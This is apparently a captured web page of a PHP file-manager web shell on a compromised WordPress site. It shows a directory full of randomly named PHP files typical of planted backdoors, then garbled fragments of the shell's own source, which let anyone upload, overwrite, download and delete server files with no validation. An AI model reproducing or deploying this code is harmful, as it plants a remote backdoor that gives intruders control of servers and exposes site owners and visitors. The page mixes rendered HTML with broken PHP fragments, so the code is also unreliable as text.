File Manager
Files in the directory:
1hvnzic
bylwuta
ebq1lok
ebxcrwm
fazemrx1949_90EyRPW2.php
fazemrx1949_9vitpKQ0.php
fazemrx1949_AhwoERKb.php
fazemrx1949_eehVwDpR.php
fmdhjib
gbqnpdl
guqbd.php
index.php
kivbt.php
other
pu9.php
pu911.php
swvrnco
twouz.php
utchiha_aKCOQl1m.php
utchiha_iuf4zwSV.php
utchiha_rLNhzXiO.php
utchiha_zU2KtmBp.php
v1
v1_260611_135739.zip
vvxiw.php
well-known
woggv.php
wp-confuser.php
wp-headers-blogs.php
wp_5WTKQrjn.php
wp_8UNmhRxo.php
ygfenhd
zdsad.php
Upload a File
Upload
Edit File: fazemrx1949_eehVwDpR.php
File '$filename' has been updated.
"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "
File '$filename' has been deleted.
"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "
File '$uploadedFilename' has been uploaded.
"; } else { echo "
Error uploading file '$uploadedFilename'.
"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?>
Login
File Manager
Files in the directory:
" . $file . ""; } } ?>
Upload a File
Upload
Edit File:
Save
Download
Delete
Save
Download
Delete